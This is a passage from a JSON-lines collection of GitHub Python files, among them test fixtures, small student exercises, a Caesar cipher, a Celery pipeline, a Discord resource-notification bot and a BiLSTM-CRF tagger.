run_alembic_upgrade(connection, cfg):\n cfg.attributes[\"connection\"] = connection\n command.upgrade(cfg, \"head\")\n\n\n@pytest.fixture(scope=\"session\")\ndef event_loop(request):\n \"\"\"pytest fixture to create an event loop\"\"\"\n\n loop = asyncio.get_event_loop_policy().new_event_loop()\n yield loop\n loop.close()\n\n\n@pytest_asyncio.fixture(name=\"db_setup\", scope=\"session\", autouse=True)\nasync def db_setup_fixture():\n await recreate_postgres_database(config.url)\n\n\n@pytest_asyncio.fixture(name=\"db_migrations\", scope=\"session\", autouse=True)\nasync def db_migrations_fixture(db_setup):\n async with engine.begin() as conn:\n await conn.run_sync(run_alembic_upgrade, Config(\"alembic.ini\"))\n\n # dispose the engine\n await engine.dispose()\n\n\n@pytest_asyncio.fixture(name=\"db_session\")\nasync def db_session_fixture():\n \"\"\"create a sqlalchemy session\"\"\"\n\n # create a sqlalchemy connection\n connection = await engine.connect()\n # begin a new database transaction\n trans = await connection.begin()\n # create a sessionmaker\n async_session = sessionmaker(\n engine,\n expire_on_commit=False,\n class_=AsyncSession,\n )\n # create a new session and bind it to the connection\n # this will ensure that when the transaction is rolled back\n # all calls to the session's commit will be rolled back as well\n async with async_session(bind=connection) as session:\n yield session\n\n # rollback the transaction\n await trans.rollback()\n # close the connection\n await connection.close()\n\n\n@pytest_asyncio.fixture(name=\"client\")\nasync def client_fixture(db_session: AsyncSession):\n \"\"\"the client to use in the tests\"\"\"\n\n # override the database session for the app\n # this is to ensure that the database session is always the same\n # as the one used in the tests so that the session commits are\n # always rolled back in the session fixture above\n app.dependency_overrides[get_session] = lambda: db_session\n # create a client\n async with AsyncClient(app=app, base_url=\"http://test\") as client:\n yield client\n # restore the original database session\n app.dependency_overrides.clear()\n","repo_name":"stuartaccent/fileserver","sub_path":"src/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2809,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"13236751627","text":"#First line of input is space-separated values in L1\r\n#Second line of input is space-separated values in L2\r\n\r\n#For Example:\r\n#a b c d e f g\r\n#b c d\r\n\r\nif __name__ == '__main__':\r\n d={}\r\n common=[]\r\n l1=[str(x) for x in input().split()]\r\n l2 = [str(x) for x in input().split()]\r\n for x in l1:\r\n if(x not in d):\r\n d[x] = 1\r\n for x in l2:\r\n if(x in d):\r\n common.append(x)\r\n d.pop(x)\r\n print (\"Common elements are: \"+str(common))\r\n onlyA = [str(x) for x in d]\r\n print (\"Elements present only in L1 are: \"+str(onlyA))","repo_name":"adityakrshnn/NAS","sub_path":"p01Generic.py","file_name":"p01Generic.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"9297254611","text":"#Safian Omar Qureshi\n#ID 10086638\n#TA: Mojtaba Komeili\n#T03\n#v1.60 (last modified 4:39pm, June 26, 2017)\n\n#This file in conjunction with Target.py and Pursuer.py creates objects that interact with eachother.\n#The Target object generates a user entered probability of a true/false event. The pursuer also\n#generates a true false event that is initially set to 50/50. After each interaction, the Pursuer\n#modifies its probability to create better matching results. A final statistic report is then displayed.\n\n#Limitations: the ctrl+c break out of loop command is handled by the exception and so\n#it doesn't break the loop. Can make it a little annoying to debug if needed to check the functions.\n\n#I also had trouble getting a globals.py named constant file that could be read across all files. It would \n#convenient to have a seperate named constants file that but I tried that and didn't work. So I copy pasted\n#my named constants at the top for all files. \n\n\nfrom Target import *\nfrom Pursuer import *\nLOWER_BOUND_RANDOM=0 #i tried to create a globals.py files with all the named constants\nUPPER_BOUND_RANDOM=100#so that all files can use it simultanesouly but couldnt\nCOUNT_STEP=1#get it to work for some reason so i just repeated the starting constants\nSTARTING_COUNTER=0 #for each file \n\ndef interactionsChecker(): #this function checks user input by recursion\n try:\n interactions=int(input(\"Enter amount of dates (1 or more): \"))\n if interactions<1:\n print(\"Number must be greater than 0, try again!\")\n interactions=interactionsChecker()\n except:\n print(\"Non numerical input - Try again!\")\n interactions=interactionsChecker()\n return(interactions)\n\n\ndef probabilityChecker():#this function checks user input by recursion\n aTarget=Target()\n try:\n aTarget.xIntProb=int(input(\"Enter the probability of x (0 - 100): \"))\n if aTarget.xIntProbUPPER_BOUND_RANDOM:\n print(\"Number must be between 0 - 100, try again!\")\n aTarget.xIntProb=probabilityChecker()\n except:\n print(\"Non numerical input - Try again!\")\n aTarget.xIntProb=probabilityChecker()\n return(aTarget.xIntProb)\n\n\ndef start():\n aTarget=Target() #initializes both objects\n aPursuer=Pursuer() \n\n interactions=interactionsChecker() #calling these two functions to check user is stupid \n aTarget.xIntProb=probabilityChecker()\n\n interactionsCount = STARTING_COUNTER\n numTotMatches=STARTING_COUNTER\n\n while (interactionsCount Responder -> Ledger\n#\n\n# # # Local view\n# #\n# # MockInitiator <- Interledeger -> MockResponder\n#\n\nclass MockInitiator:\n\n def __init__(self, events: List):\n self.events = events\n self.ledger_type = LedgerType.ETHEREUM\n\n async def listen_for_events(self):\n result = []\n if len(self.events) > 0:\n result = self.events.copy()\n self.events.clear()\n return result\n \n async def commit_sending(self, id: str):\n return {\"commit_status\": True, \"commit_tx_hash\" : '0x111'}\n\n async def abort_sending(self, id: str, reason: int):\n return {\"abort_status\": True, \"abort_tx_hash\" : '0x222'}\n\n\n# Responder which getting positive result\n\nclass MockResponder:\n\n def __init__(self):\n self.events = []\n self.ledger_type = LedgerType.ETHEREUM\n\n async def send_data(self, nonce: str, data: bytes):\n\n return {\"status\": 42}\n\n\n# Responder which getting negative result\n\nclass MockResponderAbort:\n\n async def send_data(self, nonce: str, data: bytes):\n\n return {\"status\": False}\n\n\n\n#\n# Test receive_transfer\n#\n\n@pytest.mark.asyncio\nasync def test_interledger_receive_transfer():\n\n t = Transfer()\n t.payload = {}\n init = MockInitiator([t])\n resp = MockResponder()\n interledger = Interledger(init, resp)\n # interledger.test_interrupt = True\n\n task = asyncio.ensure_future(interledger.receive_transfer()) \n assert task.done() == False\n l = await task\n\n assert init.events == []\n assert len(interledger.transfers) == 1\n assert l == 1\n assert interledger.transfers[0].state == State.READY\n\n##############################\n\n\n#\n# Test send_transfer\n#\n@pytest.mark.asyncio\nasync def test_interledger_send_transfer():\n\n t = Transfer()\n t.payload = {}\n t.payload['nonce'] = str(uuid4().int)\n t.payload['data'] = b\"dummy\"\n i = Interledger(MockInitiator([]), MockResponder())\n\n i.transfers = [t]\n\n task = asyncio.ensure_future(i.send_transfer())\n assert task.done() == False\n await task\n\n assert len(i.transfers_sent) == 1\n \n tr = i.transfers[0]\n assert tr.state == State.SENT\n assert asyncio.isfuture(tr.send_task)\n\n await tr.send_task\n assert tr.send_task.done() == True\n\n#\n# Test transfer_result\n#\n@pytest.mark.asyncio\nasync def test_interledger_transfer_result():\n\n async def foo():\n return 42\n\n i = Interledger(MockInitiator([]), MockResponder())\n \n t = Transfer()\n t.state = State.SENT\n t.send_task = asyncio.ensure_future(foo())\n i.transfers_sent = [t]\n \n task = asyncio.ensure_future(i.transfer_result())\n assert task.done() == False\n await task\n\n assert len(i.transfers_sent) == 0\n assert len(i.transfers_responded) == 1\n tr = i.transfers_responded[0]\n assert tr.state == State.RESPONDED\n assert tr.result == 42\n\n\n#\n# Test transfer_result with a commit\n# - need ad-hoc commit future\n#\n@pytest.mark.asyncio\nasync def test_interledger_process_result_commit():\n\n i = Interledger(MockInitiator([]), MockResponder())\n \n t = Transfer()\n t.payload = {}\n t.payload['id'] = str(uuid4().int)\n t.state = State.RESPONDED\n t.result = {\"status\": True}\n i.transfers_responded = [t]\n\n task = asyncio.ensure_future(i.process_result())\n assert task.done() == False\n await task\n\n tr = i.results_committing[0]\n assert tr.state == State.CONFIRMING\n assert tr.result['status'] == True\n assert len(i.results_commit) == 0\n assert len(i.results_abort) == 0\n \n assert len(i.transfers_responded) == 0\n\n#\n# Test transfer_result with an abort\n#\n@pytest.mark.asyncio\nasync def test_interledger_process_result_abort():\n\n i = Interledger(MockInitiator([]), MockResponder())\n \n t = Transfer()\n t.payload = {}\n t.payload['id'] = str(uuid4().int)\n t.state = State.RESPONDED\n t.result = {\"status\": False}\n i.transfers_responded = [t]\n \n task = asyncio.ensure_future(i.process_result())\n assert task.done() == False\n await task\n\n tr = i.results_aborting[0]\n assert tr.state == State.CONFIRMING\n assert tr.result['status'] == False\n assert len(i.results_commit) == 0\n assert len(i.results_abort) == 0\n\n assert len(i.transfers_responded) == 0\n\n\n#\n# Test confirm_transfer with a commit\n#\n@pytest.mark.asyncio\nasync def test_interledger_confirm_transfer_commit():\n async def foo():\n return {'commit_status': True,\n 'commit_tx_hash': '0x333'}\n\n i = Interledger(MockInitiator([]), MockResponder())\n\n t = Transfer()\n t.payload = {}\n t.payload['id'] = str(uuid4().int)\n t.result = {}\n t.state = State.CONFIRMING\n t.confirm_task = asyncio.ensure_future(foo())\n i.results_committing = [t]\n \n task = asyncio.ensure_future(i.confirm_transfer())\n assert task.done() == False\n await task\n\n res = i.results_commit[0]\n assert t.state == State.FINALIZED\n assert res['commit_status'] == True\n assert res['commit_tx_hash'] == '0x333'\n assert len(i.results_commit) == 1\n assert len(i.results_abort) == 0\n\n assert len(i.results_committing) == 0\n\n\n#\n# Test confirm_transfer with an abort\n#\n@pytest.mark.asyncio\nasync def test_interledger_confirm_transfer_abort():\n async def foo():\n return {'abort_status': True,\n 'abort_tx_hash': '0x444'}\n\n i = Interledger(MockInitiator([]), MockResponder())\n\n t = Transfer()\n t.payload = {}\n t.payload['id'] = str(uuid4().int)\n t.result = {}\n t.state = State.CONFIRMING\n t.confirm_task = asyncio.ensure_future(foo())\n i.results_aborting = [t]\n \n task = asyncio.ensure_future(i.confirm_transfer())\n assert task.done() == False\n await task\n\n res = i.results_abort[0]\n assert t.state == State.FINALIZED\n assert res['abort_status'] == True\n assert res['abort_tx_hash'] == '0x444'\n assert len(i.results_abort) == 1\n assert len(i.results_commit) == 0\n\n assert len(i.results_aborting) == 0\n\n# ##############################\n\n# #\n# # Test run\n# # - with no cleanup\n# # - with cleanup\n# #\n \n@pytest.mark.asyncio\nasync def test_interledger_run_no_cleanup():\n\n l1, l2, l3 = [], [], []\n for i in range(4):\n t1, t2, t3 = Transfer(), Transfer(), Transfer()\n t1.payload, t2.payload, t3.payload = {}, {}, {}\n t1.payload['nonce'], t1.payload['id'], t1.payload['data'] = str(uuid4().int), '1', b\"dummy1\"\n t2.payload['nonce'], t2.payload['id'], t2.payload['data'] = str(uuid4().int), '2', b\"dummy2\"\n t3.payload['nonce'], t3.payload['id'], t3.payload['data'] = str(uuid4().int), '3', b\"dummy3\"\n l1.append(t1)\n l2.append(t2)\n l3.append(t3)\n\n init = MockInitiator(l1)\n i = Interledger(init, MockResponder())\n\n with patch(\"data_transfer.interledger.Interledger.cleanup\") as mock_cleanup:\n\n task = asyncio.ensure_future(i.run())\n\n time = 0.5\n # Consume l1\n await asyncio.sleep(time) # Simulate interledger running\n\n # New events\n init.events = l2\n # Consume l2\n await asyncio.sleep(time) # Simulate interledger running\n\n # New events\n i.responder = MockResponderAbort()\n init.events = l3\n # Consume l3, but with a responder returning False -> abort\n await asyncio.sleep(time) # Simulate interledger running\n\n assert len(i.transfers) == 12\n assert len(i.transfers_sent) == 0\n assert len(i.transfers_responded) == 0\n assert len(i.results_committing) == 0\n assert len(i.results_aborting) == 0\n assert len(i.results_commit) == 8\n assert len(i.results_abort) == 4\n\n i.stop()\n await task\n\n@pytest.mark.asyncio\nasync def test_interledger_run_with_cleanup():\n\n l1, l2, l3 = [], [], []\n for i in range(4):\n t1, t2, t3 = Transfer(), Transfer(), Transfer()\n t1.payload, t2.payload, t3.payload = {}, {}, {}\n t1.payload['nonce'], t1.payload['id'], t1.payload['data'] = str(uuid4().int), '1', b\"dummy1\"\n t2.payload['nonce'], t2.payload['id'], t2.payload['data'] = str(uuid4().int), '2', b\"dummy2\"\n t3.payload['nonce'], t3.payload['id'], t3.payload['data'] = str(uuid4().int), '3', b\"dummy3\"\n l1.append(t1)\n l2.append(t2)\n l3.append(t3)\n\n init = MockInitiator(l1)\n i = Interledger(init, MockResponder())\n\n task = asyncio.ensure_future(i.run())\n\n time = 0.5\n # Consume l1\n await asyncio.sleep(time) # Simulate interledger running\n\n # New events\n init.events = l2\n # Consume l2\n await asyncio.sleep(time) # Simulate interledger running\n\n # New events\n i.responder = MockResponderAbort()\n init.events = l3\n # Consume l3, but with a responder returning False -> abort\n await asyncio.sleep(time) # Simulate interledger running\n\n assert len(i.transfers) == 0\n assert len(i.transfers_sent) == 0\n assert len(i.transfers_responded) == 0\n assert len(i.results_committing) == 0\n assert len(i.results_aborting) == 0\n assert len(i.results_commit) == 8\n assert len(i.results_abort) == 4\n\n i.stop()\n await task\n","repo_name":"SOFIE-project/ARD-Implementation","sub_path":"tests/integration/test_interledger.py","file_name":"test_interledger.py","file_ext":"py","file_size_in_byte":9414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"21504262187","text":"from math import pi\nprint(\"Ingrese el radio de una esfera: \")\nr = input()\n\nvolumen = 4/3*pi*pow(int(r),3)\nprint(\"Volumen:\", volumen)\n\n\"\"\"\nSalida con input=6 :\n Volumen: 904.7786842338603\n\"\"\"","repo_name":"agustinc24/datascience_unsam","sub_path":"Clase 1/esfera.py","file_name":"esfera.py","file_ext":"py","file_size_in_byte":193,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14008458828","text":"import dash_core_components as dcc\nimport dash_html_components as html\n\noptions_metrics = [\n 'RRMSE'\n , 'RMSE'\n , 'MARE'\n , 'R2'\n]\noptions_methos = [\n 'MLP'\n , 'DT'\n , 'RF'\n]\n\n\ndef layout():\n return [\n 'Select Metric:'\n , dcc.Dropdown(\n id='drp_options_metrics'\n # , style={'width': '30%', 'display': 'inline-block'}\n , options=[dict(label=e, value=e) for e in options_metrics]\n , multi=False\n , value=options_metrics[0]\n )\n , 'Select Methods:'\n , dcc.Dropdown(\n id='drp_options_methods_1'\n , style={'width': '25%', 'display': 'inline-block'}\n , options=[dict(label=e, value=e) for e in options_methos]\n , multi=False\n , value=options_methos[0]\n )\n , dcc.Dropdown(\n id='drp_options_methods_2'\n , style={'width': '25%', 'display': 'inline-block'}\n , options=[dict(label=e, value=e) for e in options_methos]\n , multi=False\n , value=options_methos[0]\n )\n , dcc.Dropdown(\n id='drp_options_methods_3'\n , style={'width': '25%', 'display': 'inline-block'}\n , options=[dict(label=e, value=e) for e in options_methos]\n , multi=False\n , value=options_methos[0]\n )\n , html.Button('Plot', id='bnt_plot')\n ]\n","repo_name":"ealcobaca/mlglass","sub_path":"source/vis/web_dash/layout/control.py","file_name":"control.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"25188628578","text":"from sys import maxsize\n \ndef func(array,n):\n \n ans = -maxsize - 1\n curr = 0\n i = 0\n j = 0\n s = 0\n \n for i in range(0,n):\n \n curr += int(array[i])\n \n if(ans < curr):\n ans = curr\n i = s\n j = i\n \n if(curr < 0):\n curr = 0\n s = i+1\n\n return ans\n\n \n \n\nfor _ in range(int(input())):\n n = int(input())\n array = input().split(\" \")\n\n ans = func(array,n)\n if(ans<=0):\n print(\"Cannot study - \",ans)\n else:\n print(\"Can study - \",ans)","repo_name":"its-sachin/CodeChef","sub_path":"6-08/q4.py","file_name":"q4.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"28324759697","text":"import src.nitegame as ng\nfrom src.nitegame.locals import *\n\nif __name__ == \"__main__\":\n # Initialize\n ng.init()\n\n display = ng.GLDisplay()\n running = True\n\n im = ng.InputManager()\n im.bind_defaults()\n\n # Main Loop\n while running:\n # Event\n running = im.update_inputs()\n\n if im.inputs[\"QuickExit\"].released:\n running = False\n\n # Update\n\n # Draw\n display.clear()\n\n display.update()\n","repo_name":"Nitebound/Nitegame-Engine","sub_path":"tests/core/test_gldisplay.py","file_name":"test_gldisplay.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32517948021","text":"# resources-bot\nfrom heapq import nsmallest\nimport os\nfrom pprint import pformat\n\nimport discord\nfrom discord.ext import commands, tasks\nfrom dotenv import load_dotenv\n\nfrom resources.resources import get_current_csv, GHServer\n\nload_dotenv()\nTOKEN = os.getenv('DISCORD_TOKEN')\nprint(TOKEN)\nclient = discord.Client()\n\n## Configurations\n\n# channel names that this bot will send to\nallowed_channel_names = [\n 'resources-bot'\n]\n\n## End configurations\n\ndef get_compatible_channels():\n channel_ids = []\n for guild in client.guilds:\n print(f'found guild: {guild.name}')\n for channel in guild.channels:\n print(f'found channel: {channel.name}')\n if channel.name in allowed_channel_names:\n channel_ids.append(channel.id)\n return channel_ids\n\n@tasks.loop(minutes=15)\nasync def called_once_an_hour():\n channel_ids = get_compatible_channels()\n for channel_id in channel_ids:\n channel = client.get_channel(channel_id)\n # await channel.send('test')\n\n print('getting new data')\n new_rows = get_current_csv()\n num_new_rows = len(new_rows)\n print(f'{num_new_rows} new resources')\n for n in new_rows:\n\n # remove things useless to a human\n n.pop('galaxy_id')\n n.pop('type_id')\n n.pop('group_id')\n\n # reformat some things\n\n # make name a hyper link to GH\n n['link'] = f'https://galaxyharvester.net/resource.py/{GHServer.FINALIZER.value}/{n[\"name\"]}'\n\n # Endor|Yavin 4 -> Endor, Yavin4\n n['planets'] = ','.join(n['planets'].split('|')) \n\n n_str = '\\n'.join([f'{k}: {v}' for k,v in n.items()])\n print(n_str)\n await channel.send(f'**A new resource has been verified on Galaxy Harvestor:**\\n{n_str}')\n\n@client.event\nasync def on_ready():\n print(f'{client.user} has connected to Discord!')\n for guild in client.guilds:\n print(f'In guild: {guild.name}')\n \n\ncalled_once_an_hour.start()\n\nclient.run(TOKEN)","repo_name":"ehrenb/swgops","sub_path":"resources/resources/src/resources-bot.py","file_name":"resources-bot.py","file_ext":"py","file_size_in_byte":2042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22086074042","text":"# Optimized CaesarCipher code using formula, very readable.\n# Encryption E(p) = (p + k) mod 26\n# Decryption D(c) = (c - k) mod 26\nimport string\nlibrary, res = string.ascii_lowercase, []\nuserText, k = str(input(\"Enter plain/cipher text :\\t\")), int(input(\"Enter Key :\\t\"))\nchoice = True if input(\"Press E for encryption or D for decryption :\\t\").lower() == 'e' else False\nfor letter in userText:\n if letter not in library:\n res.append(letter)\n else:\n if choice:\n res.append(library[(library.index(letter) + k) % 26])\n else:\n res.append(library[(library.index(letter) - k) % 26])\nprint(''.join(res).upper())\n","repo_name":"strenuousnerd8/Code","sub_path":"CaesarCipherOpti.py","file_name":"CaesarCipherOpti.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"26566392784","text":"import celery\n\nfrom xtas.tasks.es import is_es_document, es_address\nfrom xtas.tasks.es import get_single_result, store_single, fetch\nfrom xtas.core import app\n\n\ndef pipeline(doc, pipeline, store_final=True, store_intermediate=False,\n block=True):\n \"\"\"\n Get the result for a given document.\n Pipeline should be a list of dicts, with members task and argument\n e.g. [{\"module\" : \"tokenize\"},\n {\"module\" : \"pos_tag\", \"arguments\" : {\"model\" : \"nltk\"}}]\n @param block: if True, it will block and return the actual result.\n If False, it will return an AsyncResult unless the result was\n cached, in which case it returns the result immediately (!)\n @param store_final: if True, store the final result\n @param store_intermediate: if True, store all intermediate results as well\n \"\"\"\n # form basic pipeline by resolving task dictionaries to task objects\n tasks = [_get_task(t) for t in pipeline]\n\n if is_es_document(doc):\n idx, typ, id, field = es_address(doc)\n chain = []\n input = None\n # Check cache for existing documents\n # Iterate over tasks in reverse order, check cached result, and\n # otherwise prepend task (and cache store command) to chain\n for i in range(len(tasks), 0, -1):\n taskname = \"__\".join(t.task for t in tasks[:i])\n input = get_single_result(taskname, idx, typ, id)\n if input:\n break\n if (i == len(tasks) and store_final) or store_intermediate:\n chain.insert(0, store_single.s(taskname, idx, typ, id))\n chain.insert(0, tasks[i-1])\n if not chain: # final result was cached, good!\n return input\n elif input is None:\n input = fetch(doc)\n else:\n # the doc is a string, so we can't use caching\n chain = tasks\n input = doc\n\n chain = celery.chain(*chain).delay(input)\n if block:\n return chain.get()\n else:\n return chain\n\n\ndef _get_task(task_dict):\n \"Create a celery task object from a dictionary with module and arguments\"\n task = task_dict['module']\n if isinstance(task, (str, unicode)):\n task = app.tasks[task]\n args = task_dict.get('arguments')\n if isinstance(args, dict):\n return task.s(**args)\n elif args:\n return task.s(*args)\n else:\n return task.s()\n","repo_name":"NLeSC/xtas","sub_path":"xtas/tasks/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","stars":93,"dataset":"github-code","pt":"52"} +{"seq_id":"22722520061","text":"import numpy as np\nimport os\nimport preprocess_em\nimport preprocess_update\nimport utils\nimport torch\nfrom torch import nn\nfrom torchcrf import CRF\n\n\nclass Bilstm_crf(nn.Module):\n def __init__(self, vocab_size, tag_to_id, id_to_tag, embedding_dim, hidden_dim,\n pretrained_weight1, pretrained_weight2, batch_size, drop_out, num_steps,\n id2word):\n super(Bilstm_crf, self).__init__()\n self.vocab_size = vocab_size\n self.tag_to_id = tag_to_id\n self.id_to_tag = id_to_tag\n self.embedding_dim = embedding_dim\n self.hidden_dim = hidden_dim\n self.label_size = len(tag_to_id)\n self.batch_size = batch_size\n self.drop0 = nn.Dropout(p=drop_out/2)\n self.drop = nn.Dropout(p=drop_out)\n # self.relu = nn.ReLU()\n self.num_steps = num_steps\n self.id2word = id2word\n # self.batch_norm1 = nn.BatchNorm1d(num_features=120)\n # self.batch_norm2 = nn.BatchNorm1d(num_features=120)\n # self.batch_norm3 = nn.BatchNorm1d(num_features=120)\n self.batch_norm0 = nn.BatchNorm1d(num_features=270)\n self.batch_norm1 = nn.BatchNorm1d(num_features=512)\n # self.start_tag = ''\n\n self.word_embeds1 = nn.Embedding.from_pretrained(pretrained_weight1, freeze=False)\n # self.word_embeds1.weight.requires_grad = True\n self.second_word_embeds1 = nn.Embedding.from_pretrained(pretrained_weight1, freeze=False)\n\n self.word_embeds2 = nn.Embedding.from_pretrained(pretrained_weight2, freeze=False)\n # self.word_embeds2.weight.requires_grad = True\n self.second_word_embeds2 = nn.Embedding.from_pretrained(pretrained_weight1, freeze=False)\n\n self.pos_embeds = nn.Embedding(num_embeddings=num_steps, embedding_dim=40)\n self.second_pos_embeds = nn.Embedding(num_embeddings=num_steps, embedding_dim=40)\n\n self.char_pos_embeds = nn.Embedding(num_embeddings=11, embedding_dim=30,\n padding_idx=10)\n self.second_char_pos_embeds = nn.Embedding(num_embeddings=11, embedding_dim=30,\n padding_idx=10)\n\n # self.sin_embeds = nn.Embedding(num_embeddings=11, embedding_dim=25)\n # self.cos_embeds = nn.Embedding(num_embeddings=11, embedding_dim=25)\n\n # transformer-like position embedding\n self.trig_pos = utils.get_pos_trig_emb(num_steps, 200)\n self.trig_pos_embeds = nn.Embedding.from_pretrained(self.trig_pos, freeze=True)\n\n self.conv0 = nn.Conv1d(in_channels=embedding_dim + 270, out_channels=256,\n kernel_size=(9,), padding=(4,))\n self.conv1 = nn.Conv1d(in_channels=embedding_dim + 270, out_channels=256,\n kernel_size=(7,), padding=(3,))\n\n # self.conv2 = nn.Conv1d(in_channels=250, out_channels=250,\n # kernel_size=(9,), padding=(4,))\n\n self.rnn1 = nn.LSTM(input_size=embedding_dim + 70, hidden_size=200, num_layers=1,\n batch_first=True, bidirectional=True)\n self.rnn2 = nn.LSTM(input_size=512, hidden_size=hidden_dim, num_layers=1,\n batch_first=True, bidirectional=True)\n\n self.multi_attn1 = nn.MultiheadAttention(embed_dim=(200+hidden_dim) * 2, num_heads=10, dropout=drop_out)\n self.multi_attn2 = nn.MultiheadAttention(embed_dim=(200+hidden_dim) * 2, num_heads=10, dropout=drop_out)\n\n # self.hidden1_2 = nn.Linear(hidden_dim*2, hidden_dim)\n # self.hidden2_tag = nn.Linear(hidden_dim, self.target_size)\n # self.attn1_tag = nn.Linear(hidden_dim * 2, self.label_size)\n # self.attn2_tag = nn.Linear(hidden_dim * 2, self.label_size)\n # self.rnn_tag = nn.Linear(hidden_dim * 2, self.label_size)\n self.batch_norm_ffnn = nn.BatchNorm1d(num_features=(200+hidden_dim) * 6)\n self.ffnn_tag3 = nn.Linear((200+hidden_dim) * 6, self.label_size * 9)\n self.tag3_tag = nn.Linear(self.label_size * 9, self.label_size)\n\n self.transitions = nn.Parameter(torch.full((self.label_size, self.label_size), -4.))\n # add initialized hard-coded transition values if needed\n for i in range(self.label_size):\n for j in range(self.label_size):\n if (i == 0 and j in [0, 1, 3, 4, 6]) \\\n or (i in [1, 2] and j in [0, 2]) \\\n or (i in [3, 8] and j in [0, 8]) \\\n or (i in [4, 5] and j in [0, 5]) \\\n or (i in [6, 7] and j in [0, 7]):\n self.transitions.data[i, j] = 0.\n elif (i in [1, 3, 4, 6] and j in [1, 3, 4, 6]) \\\n or (i in [2, 5, 7, 8] and j in [1, 3, 4, 6]):\n self.transitions.data[i, j] = 0.\n\n # self.start_trans = nn.Parameter(torch.full((self.label_size,), -100.))\n # for i in range(self.label_size):\n # if i in [3,5,7,8]:\n # self.start_trans.data[i] = 0.\n\n self.crf = CRF(num_tags=self.label_size, batch_first=True)\n self.crf.start_transitions = nn.Parameter(torch.zeros(self.label_size, ))\n self.crf.end_transitions = nn.Parameter(torch.zeros(self.label_size, ))\n self.crf.transitions = self.transitions\n\n def _get_lstm_attn_features(self, sentences, sent_em, lengths):\n embeds1 = self.word_embeds1(sentences) # (batch, 80, 100)\n embeds2 = self.word_embeds2(sent_em)\n\n second_embeds1 = self.second_word_embeds1(sentences)\n second_embeds2 = self.second_word_embeds2(sent_em)\n\n pos = torch.IntTensor(np.asarray([np.arange(0, 80, 1)] * embeds1.shape[0]))\n pos_embeds = self.pos_embeds(pos)\n second_pos_embeds = self.second_pos_embeds(pos)\n\n trig_embeds = self.trig_pos_embeds(pos)\n\n char_idx = utils.get_char_pos(sentences, lengths, self.id2word)\n char_embeds = self.char_pos_embeds(torch.IntTensor(char_idx))\n second_char_embeds = self.second_char_pos_embeds(torch.IntTensor(char_idx))\n\n # sin_enc, cos_enc = utils.get_trig_emb(embeds1.shape[0], embeds1.shape[1])\n # sin_embeds = self.sin_embeds(torch.IntTensor(sin_enc))\n # cos_embeds = self.sin_embeds(torch.IntTensor(cos_enc))\n\n # print(f\"pos embed shape: {pos_embeds.shape}\")\n # pos_input = torch.transpose(pos_embeds, 0, 1)\n\n # input = torch.transpose(embeds, 0, 1) # (80, batch, 100)\n # input = self.drop(input)\n\n # concat_input = torch.cat((pos_input, input), dim=2)\n # lstm_out, _ = self.lstm(self.drop(concat_input)) # lstm_out: (80, batch, 240)\n\n concat_embed0 = torch.cat((second_pos_embeds, second_char_embeds, second_embeds1, second_embeds2), dim=2)\n concat_embed0 = torch.transpose(concat_embed0, 1, 2) # (batch, 320, 80)\n rnn_input1 = self.batch_norm0(concat_embed0)\n rnn_input1 = rnn_input1.permute(2, 0, 1)\n rnn_out1, _ = self.rnn1(self.drop0(rnn_input1))\n rnn_out1 = self.drop(rnn_out1)\n\n concat_embed1 = torch.cat((pos_embeds, trig_embeds, char_embeds,\n embeds1, embeds2), dim=2)\n # print(concat_embed.shape)\n concat_embed1 = torch.transpose(concat_embed1, 1, 2) # (batch, 320, 80)\n\n concat_input0 = self.conv0(concat_embed1)\n concat_input1 = self.conv1(concat_embed1)\n\n # each one is (batch, 120, 80)\n # first concat, then batch_norm, permute, and drop\n concat_input = self.batch_norm1(torch.cat((concat_input0, concat_input1), dim=1))\n concat_input = concat_input.permute(2, 0, 1)\n # rnn_out1, _ = self.rnn(self.drop(concat_input)) # rnn_out: (80, batch, 600)\n # rnn_out1 = self.drop(rnn_out1)\n\n rnn_out2, _ = self.rnn2(self.drop(concat_input)) # rnn_out: (80, batch, 600)\n rnn_out2 = self.drop(rnn_out2)\n\n rnn_out = torch.cat((rnn_out1, rnn_out2), dim=2)\n padding_mask = torch.zeros(rnn_out.shape[1], rnn_out.shape[0], dtype=torch.int) # (batch, 80)\n for i in range(rnn_out.shape[1]):\n if lengths[i] < rnn_out.shape[0]:\n padding_mask[i, lengths[i]:] = 1\n\n # Q, K, V: lstm_out\n attn_output1, _ = self.multi_attn1.forward(rnn_out, rnn_out, rnn_out, key_padding_mask=padding_mask)\n\n # the batch norm layer expects an input in [batch_size, features, temp.dim],\n # which is [batch_size, features, 80]\n\n attn_output2, _ = self.multi_attn2.forward(attn_output1, attn_output1, attn_output1, key_padding_mask=padding_mask)\n\n # output = self.hidden1_2(self.drop(attn_output)) # output: (80, batch, 120)\n # features = self.hidden2_tag(self.drop(output)) # features: (80, batch, tag_size)\n # feature1 = self.attn1_tag(attn_output1)\n # feature2 = self.attn2_tag(attn_output2)\n # rnn_feats = self.rnn_tag(rnn_out)\n\n features = torch.cat((attn_output1, attn_output2, rnn_out), dim=2)\n features = self.batch_norm_ffnn(features.permute(1, 2, 0))\n features = self.ffnn_tag3(features.permute(2, 0, 1))\n\n # features = torch.cat((feature1, feature2, rnn_feats), dim=2)\n # print(features.shape) # (80, batch_size, 3 * tag_size)\n features = self.tag3_tag(features)\n return features\n\n def neg_log_likelihood(self, sentences, sent_em, tags, lengths, mask):\n feats = 